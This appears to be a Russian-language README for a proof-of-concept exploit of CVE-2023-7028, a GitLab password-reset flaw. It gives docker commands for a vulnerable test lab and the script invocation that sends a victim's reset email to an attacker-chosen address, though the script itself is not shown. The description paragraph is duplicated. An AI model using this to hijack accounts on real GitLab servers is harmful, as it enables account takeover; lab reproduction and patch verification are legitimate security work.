
Обнаружена проблема в GitLab CE/EE, затрагивающая все версии с 16.1 до 16.1.6, с 16.2 до 16.2.9, с 16.3 до 16.3.7, с 16.4 до 16.4.5, с 16.5 до 16.5.6, с 16.6 до 16.6.4 и с 16.7 до 16.7.2, в которой письма о сбросе пароля учётной записи пользователя могли доставляться на неподтверждённый адрес электронной почты.
Обнаружена проблема в GitLab CE/EE, затрагивающая все версии от 16.1 до 16.1.6, от 16.2 до 16.2.9, от 16.3 до 16.3.7, от 16.4 до 16.4.5, от 16.5 до 16.5.6, от 16.6 до 16.6.4 и от 16.7 до 16.7.2, в которых письма для сброса пароля учётной записи могли доставляться на неподтверждённый адрес электронной почты.
Poc протестирован на Kali 2023.3
#sudo docker pull gitlab/gitlab-ee:16.7.0-ee.0
#sudo docker run --detach --publish 8443:443 --publish 2222:22 --publish 8080:80 --name gitlab-container --restart always --volume $GITLAB_HOME/config:/etc/gitlab --volume $GITLAB_HOME/logs:/var/log/gitlab --volume $GITLAB_HOME/data:/var/opt/gitlab --shm-size 256m gitlab/gitlab-ee:16.7.0-ee.0
наберитесь терпения: запуск займёт некоторое время!
настройте smtp в контейнере gitlab https://docs.gitlab.com/omnibus/settings/smtp.html
Войдите в gitlab
#sudo docker exec -it gitlab-container grep "Password:" /etc/gitlab/initial_root_password Логин/пароль: root/результат grep выше


затем создайте пользователя с действующим адресом электронной почты и подтвердите свою учётную запись


запустите poc
./cve-2023-7028.sh https://gitlab.site.com [email protected] [email protected]
в результате письмо отправляется и на исходный адрес электронной почты, и на другой адрес

Обходной путь/Исправление: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставлен ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его на любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям является незаконным, и пользователи, уличенные в осуществлении несанкционированных действий, подлежат судебному преследованию. Автор НЕ несёт ответственности за любой ущерб, причинённый неправильным использованием этого скрипта.